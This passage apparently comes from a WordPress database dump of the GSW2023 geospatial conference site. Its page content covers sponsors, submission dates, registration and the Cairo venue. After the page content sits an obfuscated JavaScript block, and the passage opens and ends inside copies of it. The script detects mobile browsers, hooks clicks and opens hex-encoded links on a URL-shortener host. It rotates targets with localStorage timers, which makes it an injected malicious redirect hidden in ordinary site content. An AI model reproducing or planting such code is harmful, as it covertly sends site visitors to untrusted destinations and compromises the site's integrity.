38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:48:30','2023-04-02 02:48:30','',3066,'https://gsw2023.com/?p=4005',0,'revision','',0),
(4006,1,'2023-04-02 02:49:02','2023-04-02 02:49:02','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 